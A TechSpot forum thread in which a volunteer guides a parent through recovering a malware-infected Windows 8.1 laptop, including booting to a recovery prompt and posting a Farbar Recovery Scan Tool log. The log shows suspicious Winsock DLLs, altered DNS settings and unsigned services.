TechSpot

Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

By Gitanjali
Jan 10, 2016
  1. Hi,

    Sorry about this - not too sure who to turn to as I think that with your help, I could be able to fix this problem. Kids downloaded something and then computer started acting up. Can't even do anything unless I'm in safe mode. Laptop runs Windows 8.1 and it is a few years old as it came from the kids' father. I can email the jpg screenshot. Would appreciate any help/assistance you could offer.

    Kind regards,
    Not too tech-savy single-mom
     
  2. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    Welcome aboard [​IMG]

    Please, complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
    Attached logs won't be reviewed.

    Please, observe following rules:
    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Thanks for the prompt response; however, I can't even start as I can't get anything open as the message takes up the whole screen and the keyboard seems to be unresonsive. I now can't get into safe mode and have tried a few times. Still wondering where to start. Thanks for taking the time to help :)
     
  4. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    NOTE 1. Use another working computer to download Farbar Recovery Scan Tool. Use USB flash drive to transfer it from good computer to the bad one.
    NOTE 2. Install Panda USB Vaccine, or BitDefender’s USB Immunizer on GOOD computer to protect it from any infected USB device.

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

    Plug the flashdrive into the infected PC.

    If you are using Windows 10 If you're having problems accessing System Recovery Options create Windows 10 USB or DVD as described here: http://betanews.com/2015/07/29/how-...your-own-installation-usb-flash-drive-or-dvd/ and boot from it.

    If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt. To access Advanced Boot Options start and shut down computer TWICE. On third start you should see Advanced Boot Options.

    If you are using Vista or Windows 7 enter System Recovery Options.

    To enter System Recovery Options from the Advanced Boot Options:
    • Restart the computer.
    • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
    • Use the arrow keys to select the Repair your computer menu item.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account an click Next.

    To enter System Recovery Options by using Windows installation disc:
    • Insert the installation disc.
    • Restart your computer.
    • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
    • Click Repair your computer.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    On the System Recovery Options menu you will get the following options:

    • Startup Repair
    • System Restore
    • Windows Complete PC Restore
    • Windows Memory Diagnostic Tool
    • Command Prompt
    • Select Command Prompt
    • In the command window type in notepad and press Enter.
    • The notepad opens. Under File menu select Open.
    • Select "Computer" and find your flash drive letter and close the notepad.
    • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
      Note:
      Replace letter e with the drive letter of your flash drive.
    • The tool will start to run.
    • When the tool opens click Yes to disclaimer.
    • Press Scan button.
    • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
     
  5. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Thanks! will get on on it as I've now been able to get into safe mode!
     
  6. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    Cool :)
     
  7. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Just a quick question - if I've already backed up my data and have a reboot USB that will put my computer back to factory settings and supposedly wipe the system clean, should I do that instead? I know that you've given me detailed advise (which I truly appreciate) but I wondering won't that be the easiest way to restart from scratch or do you think it best to do not do that at all?
     
  8. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    Not sure what to tell you.
    It must be your call.
     
  9. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Okay - so I'm reading all of the steps

    How do you tell for the instruction below? System information? Older computers are 32bit ....correct, so anything over 10+ years?

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.
     
  10. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    Incorrect version will simply throw an error so you can't break anything by trying.
     
  11. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Okay scan is running - I'm thinking that once it's done - a dialogue box should pop up? Right? Any ideas as to how long it takes as the tool is now not responding and the command prompt has now gone back to flashing. I'd like to take out the USB but don't want to until it is safe to do.
     
  12. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Sorry another couple of quick questions

    - what do you with the log after I post it? I'm hoping that you'll continue to give me detailed instructions on how to remove whatever it is on the system.

    -Are you on Pacific Time? As I'd like to see if it's at all possible to get this fixed asap.

    Again - thanks for your help :)
     
  13. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    So here it is:


    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
    Ran by owner (administrator) on ACER (10-01-2016 18:13:23)
    Running from E:\
    Loaded Profiles: owner (Available Profiles: owner)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser not detected!)
    Boot Mode: Safe Mode (minimal)
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
    HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
    HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
    HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
    HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
    HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
    HKLM-x32\...\Run: [LManager] => [X]
    HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
    HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
    HKLM-x32\...\Run: [oasi_en_323010107] => [X]
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
    AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
    ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
    SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
    FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
    FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
    FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    StartMenuInternet: FIREFOX.EXE - firefox.exe

    Chrome:
    =======
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
    CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
    CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
    CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
    CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
    CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
    CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
    CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
    CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
    S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
    S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
    S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
    S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
    S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
    S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
    S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
    S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
    S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
    S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
    S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
    S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
    S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
    S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
    S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
    R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
    R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
    S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
    S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
    S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
